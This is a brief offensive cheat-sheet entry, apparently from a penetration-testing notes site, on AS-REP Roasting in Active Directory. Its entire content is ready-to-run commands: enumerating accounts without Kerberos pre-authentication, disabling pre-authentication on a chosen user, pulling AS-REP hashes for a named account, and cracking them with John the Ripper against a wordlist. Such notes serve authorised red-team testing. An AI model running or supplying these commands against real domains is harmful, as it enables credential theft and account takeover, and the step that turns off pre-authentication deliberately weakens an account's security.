AS-REP Roasting

Enumerate

Enumerating accounts with Kerberos pre-authentication disabled

Get-DomainUser -PreauthNotRequired -Verbose

Disable pre-authentication

Set-DomainObject -Identity <User> -XOR @{useraccountcontrol=4194304} -Verbose

Retrieve the hash

Get-ASREPHash -UserName VPN1user -Verbose
Invoke-ASREPRoast -Verbose

Crack

john.exe --wordlist=passwords.txt asrephashes.txt

Last updated